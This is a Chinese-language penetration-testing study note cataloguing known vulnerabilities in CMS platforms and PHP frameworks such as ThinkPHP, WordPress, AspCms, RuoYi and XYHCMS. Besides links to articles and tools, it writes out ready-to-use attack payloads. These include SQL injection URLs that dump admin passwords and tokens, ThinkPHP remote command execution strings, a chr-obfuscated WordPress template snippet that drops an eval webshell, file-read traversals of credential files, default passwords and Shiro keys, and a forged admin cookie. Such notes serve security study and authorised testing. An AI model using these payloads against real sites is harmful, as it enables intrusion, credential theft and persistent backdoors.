0


学习笔记-B/S - Exploits

B/S - Exploits


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

大纲


各类论坛/CMS框架

什么是 CMS

内容管理系统 (CMS) 是一种存储所有数据 (如文本,照片,音乐,文档等) 并在你的网站上提供的软件. 它有助于编辑,发布和修改网站的内容.

工具包

  • SecWiki/CMS-Hunter - CMS 漏洞测试用例集合
  • Q2h1Cg/CMS-Exploit-Framework - 一款 CMS 漏洞利用框架,通过它可以很容易地获取、开发 CMS 漏洞利用插件并对目标应用进行测试。
  • Lucifer1993/AngelSword - Python3 编写的 CMS 漏洞检测框架
  • foospidy/web-cve-tests - A simple framework for sending test payloads for known web CVEs.

74CMS

骑士 CMS 6.0.48以下文件包含getshell

  • 相关文章 - 骑士cms文件包含getshell复现

AEN

相关工具

  • 0ang3el/aem-hacker

aspcms

fofa: Powered by AspCms2

AspCms1.5 版以下注入漏洞

  • POC | Payload | exp# 爆用户名 EXPhttp://www.***.com/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1这是爆 ID=1 的账户名,如果发现权限不够可以往后试 2,3,4………..# 爆密码http://www.xxx.com/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1后台登录地址:/admin/login.asp后台拿 shell1. 直接上传`.asp;x`2. 系统配置信息3. 模版管理新建 `1.asp` 模板,内容写马的内容.

AspCms2.1.4 GBK 版,未验证权限、且存在注入漏洞

  • POC | Payload | expadmin/_content/_About/AspCms_AboutEdit.asp``````http://www.xxx.com/admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1

AspCms2.0未验证权限,且存在注入漏洞

  • POC | Payload | expadmin/_content/_About/AspCms_AboutEdit.asp?id=19- 表名:aspcms_user- 列名:loginname、passwordhttp://www.xxx.com/admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1

Cookies 欺骗

  • POC | Payload | expcookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9

进入后台后GetShell

  • POC | Payload | exp 所有版本存在后台编辑风格 可以修改任意文件,获取webshell就很简单了http://www.xxx.com/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp 插入asp;x文件蚁剑连接即可。

dedeCMS

官网 : http://www.dedecms.com/

相关工具

  • lengjibo/dedecmscan - 织梦全版本漏洞扫描工具

相关文章

  • 解决DEDECMS历史难题--找后台目录
  • Dedecms 最新版漏洞收集并复现学习

5.8.1 rce

  • 相关文章 - Chasing a Dream :: Pre-authenticated Remote Code Execution in Dedecms- DedeCMS 未授权RCE漏洞原理及影响面分析

SRC-2021-0029 : Dedecms GetCookie Type Juggling Authentication Bypass Vulnerability


Discuz

Discuz

官网 : https://www.discuz.net/forum.phphttps://gitee.com/Discuz/DiscuzX

相关文章

  • Discuz!X 前台任意文件删除漏洞深入解析
  • Discuz!因Memcached未授权访问导致的RCE
  • Discuz!X 个人账户删除漏洞
  • Discuz!x3.4后台文件任意删除漏洞分析
  • DiscuzX v3.4 排行页面存储型XSS漏洞 分析
  • WooYun-2015-137991 Discuz利用UC_KEY进行前台getshell2

CVE-2018-14729

  • 描述Discuz!1.5 至 2.5 中的 source/admincp/admincp_db.php 中的数据库备份功能允许远程攻击者执行任意 PHP 代码。
  • 影响版本- Discuz! 1.5 ~ 2.5
  • 相关文章- Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729)
  • POC | Payload | exp- FoolMitAh/CVE-2018-14729

DiscuzX 3.4 SSRF

  • 相关文章 - 实例分析 DiscuzX 3.4 SSRF漏洞- Discuz x3.4前台SSRF

Discuz!ML

官网 : https://discuz.ml/

discuzml-v-3-x-code-injection-vulnerability

  • POC | Payload | exp - theLSA/discuz-ml-rce

CVE-2019-13956

  • 描述该漏洞存在 discuz ml(多国语言版)中,cookie 中的 language 可控并且没有严格过滤,导致可以远程代码执行。
  • 影响版本- Discuz! ML V3.2- Discuz! ML V3.3- Discuz! ML V3.4
  • 相关文章- Discuz! ML远程代码执行(CVE-2019-13956)- Discuz!ML V3.X 代码注入分析

Drupal

官网 : https://www.drupal.org/

Tips

对'/node/$'进行Fuzz,其中'$'是一个数字(从1到500)。⽐如说:"/node/$"。

CVE-2014-3704 “Drupalgeddon” SQL 注入漏洞

CVE-2017-6920 Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞

  • 描述2017年6月21日,Drupal 官方发布了一个编号为 CVE-2017- 6920 的漏洞,影响为 Critical.这是 Drupal Core 的 YAML 解析器处理不当所导致的一个远程代码执行漏洞,影响 8.x 的 Drupal Core.
  • 影响版本- Drupal 8.x
  • 相关文章- CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造- Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞 (CVE-2017-6920)

CVE-2018-7600 Drupal Drupalgeddon 2 远程代码执行漏洞

CVE-2018-7602 远程代码执行漏洞

  • 影响版本- Drupal 7.x- Drupal 8.x
  • POC | Payload | exp- Drupal 远程代码执行漏洞(CVE-2018-7602)- CVE-2018-7600/drupa7-CVE-2018-7602.py

CVE-2019-6339 远程代码执行漏洞

CVE-2019-6341 XSS

CVE-2020-28948

  • 相关文章 - Drupal(CVE-2020-28948/CVE-2020-28949)分析

ECshop

官网 : http://www.ecshop.com/

ECShop 是一款 B2C 独立网店系统,适合企业及个人快速构建个性化网上商店.系统是基于 PHP 语言及 MYSQL 数据库构架开发的跨平台开源程序.

ECShop 2.x/3.x SQL 注入/任意代码执行漏洞

  • 描述其2017年及以前的版本中,存在一处 SQL 注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞.其 3.6.0 最新版已修复该漏洞.
  • 影响版本- ECShop 2.x/3.x
  • 相关文章- ECShop 2.x/3.x SQL注入/任意代码执行漏洞- ecshop2.x 代码执行

ecshop后台getshell

  • 相关文章 - ecshop后台getshell

Fastadmin

项目: https://github.com/karsonzhang/fastadmin

FastAdmin 是一款基于 ThinkPHP5+Bootstrap 开发的极速后台开发框架。FastAdmin 基于 Apache2.0 开源协议发布,目前被广泛应用于各大行业应用后台管理。

Fastadmin 前台 Getshell

  • 相关文章 - fastadmin最新版前台getshell漏洞

Laravel

Fofa: app="Laravel-Framework"

相关文章

  • Laravel 6.x/7.x的一条执行代码的反序列化利用链

env 泄露

  • POC | Payload | exp/.env

日志泄露

  • POC | Payload | exp/storage/logs/laravel.log

Debug模式

  • POC | Payload | exp/logout/param[]=0

Laravel PHPUnit Remote Code Execution

  • 影响版本- Before 4.8.28 and 5.x before 5.6.3
  • POC | Payload | expcurl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

CVE-2021-3129 Laravel Debug 页面 RCE

  • 相关文章- LARAVEL <= V8.4.2 DEBUG MODE: REMOTE CODE EXECUTION- 漏洞分析 | Laravel Debug页面RCE(CVE-2021-3129)分析复现- 再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞
  • POC | Payload | exp- ambionics/laravel-exploits

Laravel 8.x image upload bypass

  • 相关文章 - Laravel 8.x image upload bypass

jeecg

fofa: app="JEECG"

相关文章

  • JAVA代码审计-JEECG快速开发平台(一)

密码重置

  • POC | Payload | exp - 当访问loginController.do?goPwdInit 或 pwdInit时,即使用户已经修改过密码,admin的密码仍会被重置为123456。

sessionid 信息泄露

  • POC | Payload | exphttp://localhost:8080/webpage/system/druid/websession.json

文件上传

  • POC | Payload | exp/jeecgFormDemoController.do?commonUpload

jeewms

Fofa: body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" && body="仓"

未授权任意文件读取漏洞

  • POC | Payload | exphttp://x.x.x.x:8088/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.inihttp://x.x.x.x:8020/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd

Joomla

官网 : https://www.joomla.org/

相关工具

  • rezasp/joomscan - 效果很差,没啥用

CVE-2017-8917 Joomla! 3.7 Core SQL 注入

  • 描述Joomla 于5月17日发布了新版本 3.7.1,本次更新中修复一个高危 SQL 注入漏洞,成功利用该漏洞后攻击者可以在未授权的情况下进行 SQL 注入。
  • 影响版本- joomla 3.7.0
  • 相关文章- Joomla! 3.7 Core SQL 注入 (CVE-2017-8917)漏洞分析
  • POC | Payload | exphttp://你的 IP 地址:端口号/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)sqlmap payloadsqlmap -u "http://192.168.1.1/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -T '#__users' -C name,password --dump

CVE-2021-23132

  • POC | Payload | exp - HoangKien1020/CVE-2021-23132

Maccms

Maccms v10后门


MetInfo

官网: https://www.metinfo.cn/

相关文章

  • MetInfo5.3.19安装过程过滤不严导致Getshell
  • MetInfo6.0.0漏洞集合(一)
  • MetInfo6.1.0 漏洞(二)
  • Metinfo 6.1.2 SQL注入
  • metinfo最新版本后台getshell
  • Metinfo7的一些鸡肋漏洞
  • Metinfo7.0 SQL Blind Injection

CVE-2018-13024

  • 描述远程攻击者可通过向 admin/column/save.php 文件发送 module 参数利用该漏洞向 .php 文件写入代码并执行该代码.
  • 影响版本- MetInfo 5.3.16- MetInfo 6.0.0
  • 相关文章- CVE-2018-13024复现及一次简单的内网渗透
  • POC | Payload | exp- admin/column/save.php?name=123&action=editor&foldername=upload&module=22;@eval($_POST[1]);/*

October

官网: http://octobercms.com

October CMS 1.0.412 - Multiple Vulnerabilities

  • POC | Payload | exp - October CMS 1.0.412 - Multiple Vulnerabilities

pBootCMS

pBootCMS 3.0.4 前台注入

  • 相关文章 - pBootCMS 3.0.4 前台注入漏洞复现

php7cms

文件包含漏洞

  • 相关文章 - php7cms 文件包含漏洞

PHPMyWind

相关文章

  • 记一次渗透测试历程
  • phpmywind最新版sql注入以及后台目录遍历和文件读取
  • PHPMyWind v5.5 审计记录

PHPMyWind 5.3 - Cross-Site Scripting


RuoYi

Fofa: app="若依-管理系统"

默认口令

admin/admin123

后台任意文件读

  • 影响版本- RuoYi <= v4.5.0
  • POC | Payload | exp/common/download/resource?resource=/profile/../../../../etc/passwd

druid 未授权访问

  • POC | Payload | exp/prod-api/druid/index.html

默认shiro key

fCq+/xW488hMTCD+cmJ3aQ==
zSyK5Kp6PZAAjlT+eeNMlg==

4.6.1 后台注入

  • 相关文章- Xcheck Java引擎漏洞挖掘&防护识别
  • POC | Payload | expPOST /ruoyi/system/user/list HTTP/1.1POST /ruoyi/system/user/export HTTP/1.1POST /ruoyi/system/Allocated/list HTTP/1.1POST /ruoyi/system/role/list HTTP/1.1POST /ruoyi/system/dept/list HTTP/1.1params[dataScope]=a

4.6.2 后台RCE

  • 相关文章- 记一次若依cms后台getshell - bkfish/yaml-payload-for-Win - 用于windows反弹shell的yaml-payload- 若依CMS4.6.0后台RCE- 若依CMS后台getshell
  • POC | Payload | exp- lz2y/yaml-payload-for-ruoyi- passer-W/Ruoyi-All - 若依后台定时任务一键利用

SeaCMS

Fofa: app="海洋CMS"

CVE-2020-21378 后台SQL注入漏洞

  • 描述攻击者可通过对admin_members_group.php的编辑操作中的id参数利用该漏洞进行SQL注入攻击。
  • POC | Payload | exp/admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1)

ShopXO

CNVD-2021-15822 任意文件读取漏洞

  • 相关文章 - ShopXO download 任意文件读取漏洞 CNVD-2021-15822

Sitecore

fofa : "Sitecore Experience Platform"

Sitecore rce

  • 相关文章 - Sitecore Experience Platform Pre-Auth RCE

SiteServer

相关文章

  • 代码审计 | SiteServerCMS身份认证机制
  • 代码审计 | SiteServerCMS密钥攻击

找回密码

管理员的 “密码找回问题答案” 为非强制项,一般都留空。此时如果在密码找回页面,输入空密码找回答案,就可以获得当前管理员的密码明文(页面有做 javascript 限制答案长度不能为 0,但禁用 javascript 即可绕过)

访问 /siteserver/forgetPassword.aspx, 然后禁止 Javascript。输入用户名,获取密码

6.8.3 验证码绕过 & 后台多处注入

  • 相关文章- 某Server CMS最新6.8.3版本验证码绕过&后台多处注入
  • POC | Payload | expPOST /api/v1/administrators/actions/login HTTP/1.1{"account":"admin","password":"7fef6171469e80d32c0559f88b377245","isAutoLogin":true}``````GET /SiteServer/settings/pageAdministrator.aspx?areaId=0&departmentId=0&keyword=1&lastActivityDate=3&order=1%2C(select%20case%20when%20(3*2*1=6%20AND%2000043=00043)%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)=1&pageNum=50&roleName= HTTP/1.1GET /SiteServer/settings/pageUser.aspx?creationDate=0&groupId=-1&keyword=&lastActivityDate=0&loginCount=0&pageNum=0&searchType=if(now()=sysdate()%2Csleep(0)%2C0) HTTP/1.1

SiteServer CMS 远程模板下载 Getshell 漏洞

  • 相关文章- 简记野生应急捕获到的siteserver远程模板下载Getshell漏洞
  • POC | Payload | exp- zhaoweiho/SiteServer-CMS-Remote-download-Getshell

ThinkAdmin

项目地址 : https://github.com/zoujingli/ThinkAdmin

ThinkAdminV6 任意文件操作 CVE-2020-25540

  • 相关文章- ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现
  • POC | Payload | exp1、目录遍历注意 POST 数据包 rules 参数值需要 URL 编码POST /admin.html?s=admin/api.Update/noderules=%5B%22.%2F%22%5D2、文件读取,后面那一串是 UTF8 字符串加密后的结果。计算方式在 Update.php 中的加密函数。/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34

ThinkCMF

官网: https://www.thinkcmf.com/

Fofa: title="ThinkCMF"

ThinkCMF 任意内容包含漏洞

  • 相关文章- ThinkCMF 任意内容包含getshell漏洞
  • POC | Payload | exp- jas502n/ThinkCMF_getshell

ThinkPHP

官网: http://www.thinkphp.cn/

<5

相关文章

  • thinkphp一些版本的通杀漏洞payload
  • 代码审计 | ThinkPHP3.x、5.x框架任意文件包含
  • Thinkphp2.1爆出重大安全漏洞
  • ThinkPHP3.2.3框架实现安全数据库操作分析
  • ThinkPHP-漏洞分析集合
  • ThinkPHP3.2 框架sql注入漏洞分析(2018-08-23)
  • Thinkphp框架 3.2.x sql注入漏洞分析
  • 【漏洞通报】ThinkPHP3.2.x RCE漏洞通报

日志泄露

/Application/Runtime/Logs/Home/16_09_06.log # 其中 Application 可能会变,比如 App
/Runtime/Logs/Home/16_09_06.log             # 年份_月份_日期
/Runtime/Logs/User/16_09_06.log             # 年份_月份_日期
  • whirlwind110/tphack - Thinkphp3/5 Log 文件泄漏利用工具

5

相关文章

  • ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用 (GetShell)
  • 代码审计 | ThinkPHP3.x、5.x框架任意文件包含
  • ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
  • ThinkPHP v5.1.22曝出SQL注入漏洞
  • ThinkPHP-漏洞分析集合
  • ThinkPHP 5.1.x SQL注入漏洞分析
  • ThinkPHP框架 < 5.0.16 sql注入漏洞分析
  • ThinkPHP 5.x 远程命令执行漏洞利用过程
  • ThinkPHP漏洞总结
  • 记一次简单的Thinkphp 5.x绕过姿势

相关工具

  • Lucifer1993/TPscan - 一键 ThinkPHP 漏洞检测
  • theLSA/tp5-getshell - thinkphp5 rce 漏洞检测工具
  • sukabuliet/ThinkphpRCE - Thinkphp rce 扫描脚本,附带日志扫描
  • tangxiaofeng7/TPScan
  • bewhale/thinkphp_gui_tools - ThinkPHP 漏洞 综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含, 宝塔绕过java -Dfile.encoding="UTF-8" --module-path "C:\Program Files\Java\javafx-sdk-11.0.2\lib" --add-modules "javafx.controls,javafx.fxml,javafx.web" -jar "xxx.jar"

资源

  • Mochazz/ThinkPHP-Vuln - 关于 ThinkPHP 框架的历史漏洞分析集合
  • SkyBlueEternal/thinkphp-RCE-POC-Collection - thinkphp v5.x 远程代码执行漏洞-POC集合

日志泄露

/runtime/log/202004/1.log       # 年月/数字
  • whirlwind110/tphack - Thinkphp 3/5 Log 文件泄漏利用工具

thinkphp 5

/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

thinkphp 5.0.10(完整版)

(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

thinkphp 5.0.21

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.0.22

/?s=.|think\config/get&name=database.username
/?s=.|think\config/get&name=database.password
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.0.23(完整版)

(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

thinkphp 5.0.23(完整版)debug模式

(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

thinkphp 5.1.*

/?s=index/\think\Request/input&filter=phpinfo&data=1
/?s=index/\think\Request/input&filter=system&data=cmd
/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

thinkphp 5.2.*

(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

未知版本未知版本

?s=index/\think\module/action/param1/${@phpinfo()}
?s=index/\think\Module/Action/Param/${@phpinfo()}
?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
index.php?s=/home/article/view_recent/name/1'

header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"

index.php?s=/home/shopcart/getPricetotal/tag/1%27
index.php?s=/home/shopcart/getpriceNum/id/1%27
index.php?s=/home/user/cut/id/1%27
index.php?s=/home/service/index/id/1%27
index.php?s=/home/pay/chongzhi/orderid/1%27
index.php?s=/home/pay/index/orderid/1%27
index.php?s=/home/order/complete/id/1%27
index.php?s=/home/order/complete/id/1%27
index.php?s=/home/order/detail/id/1%27
index.php?s=/home/order/cancel/id/1%27
index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+

POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#

debug 信息泄露

  • 相关文章 - 实战技巧|利用ThinkPHP5.X的BUG实现数据库信息泄露- thinkphp5 mysql账号密码泄露漏洞

>5

thinkphp6 session 任意文件创建漏洞

  • 相关文章 - thinkphp6 session 任意文件创建漏洞复现 含POC

TPshop

目录遍历漏洞

  • 相关文章- 某shop 前台文件遍历&SSRF组合拳- 某软件存在目录遍历漏洞
  • POC | Payload | exp/index.php/Home/uploadify/fileList?type=.+&path=../../../

UCMS

CVE-2020-25483 后台文件上传漏洞

  • 相关文章 - UCMS文件上传漏洞(CVE-2020-25483)复现

vBulletin

vBulletin 5.6.1 SQL 注入

http://localhost/vb5/ajax/api/content_attach/getIndexableContent"  -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=SQLi

获取管理员用户:

http://SITE/vb5/ajax/api/content_infraction/getIndexableContent"  -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,username,8,7,6,5,4,3,2,1+from+user+where+userid=1--

获取admin token:

http://SITE/vb5/ajax/api/content_infraction/getIndexableContent"  -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,token,8,7,6,5,4,3,2,1+from+user+where+userid=1--

Weiphp

CNVD-2020-68596 前台文件任意读取

  • POC | Payload | exp - Weiphp5.0 前台文件任意读取 CNVD-2020-68596

CNVD-2021-09693 Weiphp5.0 任意用户Cookie伪造

  • 相关文章 - Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693

WordPress

官网 : https://wordpress.org/

WordPress 是一个开源的内容管理系统(CMS),允许用户构建动态网站和博客.

搭建教程

  • WordPress 搭建

Tips

  • 默认的登录地址一般是 /wp-admin/wp-login.php

相关工具

  • wpscanteam/wpscan - kali 自带,漏洞扫描需要 API Token,可扫用户、漏洞、目录,挺好用的wpscan --url https://www.xxxxx.com/ # 直接扫描wpscan --url https://www.xxxxx.com/ --enumerate u # 枚举用户wpscan --url https://www.xxxxx.com/ --passwords /tmp/password.txt # 密码爆破wpscan --url https://www.xxxxx.com/ --usernames admin --passwords out.txt # 指定用户爆破wpscan --url https://www.xxxxx.com/ --api-token xxxxxxxxCX8TTkkgt2oIY # 使用 API Token,扫描漏洞wpscan --url https://www.xxxxx.com/ -e vp --api-token xxxxxxx # 扫描插件漏洞wpscan --url https://www.xxxxx.com/ -e vt --api-token xxxxxxx # 扫描主题漏洞- WPScan使用完整教程之记一次对WordPress的渗透过程

xmlrpc.php

  • xmlrpc.php 漏洞利用
  • 查看系统允许的方法POST /wordpress/xmlrpc.php HTTP/1.1Host: www.example.comContent-Length: 99<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>
  • 账号爆破一般情况下,wordpress 的管理后台都会设置账号登录失败次数限制,因此,可以通过 xmlprc.php 接口来进行爆破。通常会使用 wp.getUserBlogs、wp.getCategories 和 metaWeblog.getUsersBlogs 这个方法来进行爆破,也可以使用其他的方法。POST /wordpress/xmlrpc.php HTTP/1.1Host: www.example.comContent-Length: 99<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>password</value></param></params></methodCall>
  • SSRFWordPress 版本 ❤️.5.1, 通过 Pingback 可以实现的服务器端请求伪造 (Server-side request forgery,SSRF) 和远程端口扫描。POST /wordpress/xmlrpc.php HTTP/1.1Host: www.example.comContent-Length: 99<methodCall><methodName>pingback.ping</methodName><params><param><value><string>要探测的ip和端口:http://127.0.0.1:80</string></value></param><param><value><string>网站上一篇博客的URL:http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string></value></param></params></methodCall>

WordPress 后台拿 SHELL

  • 后台编辑404页面Getshell"主题"-“编辑”-“404.php”<script language="php">fputs(fopen(chr(46).chr(47).chr(99).chr(111).chr(110).chr(103).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(112).chr(97).chr(115).chr(115).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));</script>插到文件头,404默认模板路径是:wp-content/themes/twentyten/404.php,其中"twentyten"目录是默认模板目录。更新完直接访问 localhost/wp-content/themes/twentyten/404.php 就会在twentyten目录生成一句话后门文件cong.php 密码pass,插入的代码是Chr加密,可自行编辑。(仔细看代码,文件名与一句话代码用" ,w "隔开了)
  • 上传本地主题Getshell本机建立目录“test”,可以直接把一句话放到index.php文件,再新建一个style.css样式文件(版本不同,上传时会判断是否存在"index.php"文件和"style.css"样式文件。)打包test目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为: localhost/wp-content/themes/test/index.php

CVE-2019-8942 & CVE-2019-8943 WordPress Crop-image Shell Upload

  • 描述此模块利用 WordPress 版本5.0.0和<= 4.9.8上的路径遍历和本地文件包含漏洞。 裁剪图像功能允许用户(至少具有作者权限)通过在上载期间更改 _wp_attached_file 引用来调整图像大小并执行路径遍历。 利用的第二部分将通过在创建帖子时更改 _wp_page_template 属性,将该图像包含在当前主题中。 目前,此漏洞利用模块仅适用于基于 Unix 的系统。
  • 影响版本- wordpress < 4.9.9- wordpress 5.0 ~ 5.0:rc3
  • POC | Payload | exp- brianwrf/WordPress_4.9.8_RCE_POC: A simple PoC for WordPress RCE (author priviledge), refer to CVE-2019-8942 and CVE-2019-8943.
  • MSF Moduleuse exploit/multi/http/wp_crop_rce

WordPress <= 5.3.? DoS

  • POC | Payload | exp - wordpress-dos-poc

CVE-2022-21661 WP_Query SQLinj

  • 相关文章 - SQL Injection in Wordpress core (CVE-2022-21661)- CVE-2022-21661 WordPress核心框架WP_Query SQL注入漏洞原理分析与复现- CVE-2022-21661: EXPOSING DATABASE INFO VIA WORDPRESS SQL INJECTION

CVE-2022-21662 WordPress 5.8.2 Stored XSS Vulnerability

  • 相关文章 - WordPress 5.8.2 Stored XSS Vulnerability- CVE-2022-21662 WordPress核心框架存储型XSS漏洞分析与复现

插件漏洞


XYHCMS

官网 : http://www.xyhcms.com/
fofa: app="XYHCMS"
fofa: icon_hash="-1300821702"

相关文章

  • xyhcms漏洞整理
  • cms通用漏洞之表达式&系统函数
  • xyhcms v3.6 命令执行

后台路径

/xyhai.php

后台任意文件读取

  • POC | Payload | exphttp://127.0.0.1/xyhai.php?s=/Templets/edit/fname/Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGRiLnBocA==

CNVD-2020-03899 后台文件写入导致代码执行漏洞

  • POC | Payload | exp后台,系统设置->网站设置->会员配置->禁止使用的名称<?eval($_POST['cmd'])?>http://localhost/App/Runtime/Data/config/site.php

后台文件写入导致代码执行漏洞2

  • POC | Payload | exp后台,系统设置->网站设置,任意设置,在输入框内填 <?php phpinfo()?>http://localhost/App/Runtime/Data/config/site.php

windows 版本文件上传漏洞

  • POC | Payload | exp后台,系统设置->网站设置->上传配置->允许附件类型,添加类型 shell.php::$DATA点击下面的 水印图片上传,之后会在图片部分显示上传路径,在windows下面,会自动忽略后面的::$DATA。

任意文件删除漏洞

  • POC | Payload | exphttp://domain/xyhai.php?s=/Database/delSqlFiles/sqlfilename/..\\..\\..\\install/install.lockPOST /xyhai.php?s=/Database/delSqlFiles/batchFlag/1key[]=../../../install/install.lock访问 http://domain/install 可以重装cms

后台任意文件下载

  • POC | Payload | exphttp://domain/xyhai.php?s=/Database/downFile/file/..\\..\\..\\App\\Common\\Conf\\db.php/type/zip

CNVD-2021-05552 反序列化

3.6 后台模版编辑rce

  • 相关文章 - 行云海CMS之模板编辑防不胜防

Yii

官网 : https://www.yiichina.com/

Yii2 是一个高性能,基于组件的开源 PHP 框架,用于快速开发现代 Web 应用程序。

CVE-2020-15148 Yii 框架反序列化 RCE

  • 描述Yii Framework 2 在其 9月14 日发布的更新日志中公布了一个反序列化远程命令执行漏洞(CVE-2020-15148)。官方通过给yii\db\BatchQueryResult类加上__wakeup()函数,禁用了yii\db\BatchQueryResult的反序列化,阻止了应用程序对任意用户输入调用’unserialize()’造成的远程命令执行。
  • 影响版本- Yii2 Version < 2.0.38
  • 相关文章- CVE-2020-15148 Yii2反序列化RCE POP链分析
